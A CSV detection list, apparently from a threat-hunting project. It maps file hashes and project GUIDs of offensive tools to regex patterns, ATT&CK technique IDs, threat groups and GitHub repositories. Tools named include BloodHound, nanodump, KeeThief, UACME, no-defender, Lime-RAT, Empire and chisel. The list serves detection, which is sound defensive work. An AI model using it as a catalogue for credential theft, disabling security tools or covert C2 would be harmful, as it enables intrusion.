"*c0d2859a5d2355d656eb7beb4c19608ab5c5d4407662bf0fd0e1f056f906f6ba*",".{0,1000}c0d2859a5d2355d656eb7beb4c19608ab5c5d4407662bf0fd0e1f056f906f6ba.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","36690"
"*c0da41824e720bb18073595598f9ee4f3b15f7cffe800f44fe0f8799b8acbe3f*",".{0,1000}c0da41824e720bb18073595598f9ee4f3b15f7cffe800f44fe0f8799b8acbe3f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36691"
"*c0dad6868eb7c797c29eda978260136be4e5c097c1a3187e3d35db66bf140946*",".{0,1000}c0dad6868eb7c797c29eda978260136be4e5c097c1a3187e3d35db66bf140946.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36692"
"*c0dca4eb22f84060319a2718d3987460ad74a50ce76dfeddee62aef685fd35c2*",".{0,1000}c0dca4eb22f84060319a2718d3987460ad74a50ce76dfeddee62aef685fd35c2.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","36693"
"*c0dn/truesocks_rs*",".{0,1000}c0dn\/truesocks_rs.{0,1000}","offensive_tool_keyword","TrueSocks","Simple API for buying renting and managing proxies","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","Defense Evasion","https://github.com/c0dn/truesocks_rs","1","1","N/A","N/A","10","1","0","0","2023-05-09T01:00:05Z","2023-04-06T02:32:04Z","36694"
"*c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f*",".{0,1000}c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","36695"
"*c0e4afb28f57864b83eb7ae3d5e63a4202decb862fbc5b17a92a51cbd1c469ca*",".{0,1000}c0e4afb28f57864b83eb7ae3d5e63a4202decb862fbc5b17a92a51cbd1c469ca.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","36696"
"*c0e65b802e813fd274aaba62a4b321210d7e55f27c7ee65516d046f9867d734e*",".{0,1000}c0e65b802e813fd274aaba62a4b321210d7e55f27c7ee65516d046f9867d734e.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","36697"
"*C0E67E76-1C78-4152-9F79-FA27B4F7CCCA*",".{0,1000}C0E67E76\-1C78\-4152\-9F79\-FA27B4F7CCCA.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","#GUIDproject","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","36698"
"*c0e6f80a5ecf346f09432ec1dab7a23f6418f6af022020420330a463eebfabe9*",".{0,1000}c0e6f80a5ecf346f09432ec1dab7a23f6418f6af022020420330a463eebfabe9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36699"
"*c0ec4fdda78c68d5b982664a121efb8939808171d11d7a1e9bc17db565d99ee1*",".{0,1000}c0ec4fdda78c68d5b982664a121efb8939808171d11d7a1e9bc17db565d99ee1.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","#filehash","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","36700"
"*c0fdcce36afa206ce080c1b8602ecf18fdc23a207078cb437594d7f674b2a693*",".{0,1000}c0fdcce36afa206ce080c1b8602ecf18fdc23a207078cb437594d7f674b2a693.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","36705"
"*C10599E3-5A79-484F-940B-E4B61F256466*",".{0,1000}C10599E3\-5A79\-484F\-940B\-E4B61F256466.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","36708"
"*c106a84af24143cbac3f066419316fbf2b0b748420381d304157c0a645788338*",".{0,1000}c106a84af24143cbac3f066419316fbf2b0b748420381d304157c0a645788338.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36709"
"*c1090dbc-f2f7-4d90-a241-86e0c0217786*",".{0,1000}c1090dbc\-f2f7\-4d90\-a241\-86e0c0217786.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","#GUIDproject","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","36710"
"*c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6*",".{0,1000}c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36711"
"*c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712*",".{0,1000}c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36712"
"*c121f7d62fa5ecd27c3aaae5737a3de8f2e4def0c182058b6dd824aa92351e9c*",".{0,1000}c121f7d62fa5ecd27c3aaae5737a3de8f2e4def0c182058b6dd824aa92351e9c.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","0","#filehash","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","36715"
"*c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade*",".{0,1000}c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","#filehash","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","36716"
"*c12cad06d0e93742fd0ce0c698c654ff3c86b567dcc4102cd2c5d931d77dcc64*",".{0,1000}c12cad06d0e93742fd0ce0c698c654ff3c86b567dcc4102cd2c5d931d77dcc64.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","36717"
"*c13a0cd7c2c2fd577703bff026b72ed81b51266afa047328c8ff1c4a4d965c97*",".{0,1000}c13a0cd7c2c2fd577703bff026b72ed81b51266afa047328c8ff1c4a4d965c97.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","36720"
"*C13C80ED-ED7A-4F27-93B1-DE6FD30A7B43*",".{0,1000}C13C80ED\-ED7A\-4F27\-93B1\-DE6FD30A7B43.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#GUIDproject","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","36721"
"*c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094*",".{0,1000}c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","36722"
"*c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0*",".{0,1000}c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36724"
"*c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf*",".{0,1000}c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36726"
"*c14cdcc5244fa9bb63ef50f28b2699c3cac0d42bd983ddb823a635842d0b143a*",".{0,1000}c14cdcc5244fa9bb63ef50f28b2699c3cac0d42bd983ddb823a635842d0b143a.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","36728"
"*c15919a683d0e4d1d71792876be6f9a7a03651e60a6a1db3ce1b8573251301aa*",".{0,1000}c15919a683d0e4d1d71792876be6f9a7a03651e60a6a1db3ce1b8573251301aa.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36730"
"*c159cb0a6a05145cbad83d2a4f12781520546f672dccf27361d40b3cf9c59ee1*",".{0,1000}c159cb0a6a05145cbad83d2a4f12781520546f672dccf27361d40b3cf9c59ee1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36731"
"*c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0*",".{0,1000}c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36732"
"*c17076b7aa8e89e2b403234e0873f24e0c784a783ad30fc190091f792dd2d3dc*",".{0,1000}c17076b7aa8e89e2b403234e0873f24e0c784a783ad30fc190091f792dd2d3dc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36734"
"*c180bfdab317b545e167896e4a622cb9f9bfb0f1e8e44ed58e1f958dde94d1ed*",".{0,1000}c180bfdab317b545e167896e4a622cb9f9bfb0f1e8e44ed58e1f958dde94d1ed.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36737"
"*c18989d8b80f11117c403bc1c8f8afac0a807f1acdf67ecffcf50402164c11eb*",".{0,1000}c18989d8b80f11117c403bc1c8f8afac0a807f1acdf67ecffcf50402164c11eb.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","36739"
"*c18c8abdaeacc30c7bdc46cf7565e5255aae8df8f34b7964ff09d35736d2816c*",".{0,1000}c18c8abdaeacc30c7bdc46cf7565e5255aae8df8f34b7964ff09d35736d2816c.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","#filehash","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","36740"
"*c18d399ff853bce9a6a0bccdd5ba741639556d61694317a5e8d33282ca2b5c88*",".{0,1000}c18d399ff853bce9a6a0bccdd5ba741639556d61694317a5e8d33282ca2b5c88.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36741"
"*c19100c9fbebb503b21a36ca64471807cf3d25b7f0efb14d579ed291d3bae78e*",".{0,1000}c19100c9fbebb503b21a36ca64471807cf3d25b7f0efb14d579ed291d3bae78e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36743"
"*c1a30c8a226a6099fa0fc3d39e1fe4e83763ad52c41675b607ab569b7957f8a7*",".{0,1000}c1a30c8a226a6099fa0fc3d39e1fe4e83763ad52c41675b607ab569b7957f8a7.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","36744"
"*c1ae1df5425338331c97fc3c3892b01aeaa7d0562369d66d6178a33e6d1f00a0*",".{0,1000}c1ae1df5425338331c97fc3c3892b01aeaa7d0562369d66d6178a33e6d1f00a0.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","36746"
"*c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf*",".{0,1000}c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36748"
"*c1c15496ae180633f6464c67cf86603d64b662d674a18f8c9e9f19c71d74acc1*",".{0,1000}c1c15496ae180633f6464c67cf86603d64b662d674a18f8c9e9f19c71d74acc1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36751"
"*c1c9047d94569bf28c91247cfa84cb49c5d49e37eaae46804663a6d1f45b615d*",".{0,1000}c1c9047d94569bf28c91247cfa84cb49c5d49e37eaae46804663a6d1f45b615d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","36752"
"*c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1*",".{0,1000}c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36753"
"*c1cc14efcd2df072977c1371065807c3d2e4c6a576db89230b5c19e0ef00040d*",".{0,1000}c1cc14efcd2df072977c1371065807c3d2e4c6a576db89230b5c19e0ef00040d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","36754"
"*c1ce14f634f6ed7a60ac4e69d35eb745c2238408ec5c6faacde3489b04f64e7d*",".{0,1000}c1ce14f634f6ed7a60ac4e69d35eb745c2238408ec5c6faacde3489b04f64e7d.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","36755"
"*C1E1BD733564A70F30B59BC7B8067BF47512D70D71C15B18F49B5BEC2891CB44*",".{0,1000}C1E1BD733564A70F30B59BC7B8067BF47512D70D71C15B18F49B5BEC2891CB44.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","36756"
"*c1e4c31f5944d6f9b5d8e08f09733807360052c69df4c34bf09f31e960f02b04*",".{0,1000}c1e4c31f5944d6f9b5d8e08f09733807360052c69df4c34bf09f31e960f02b04.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36757"
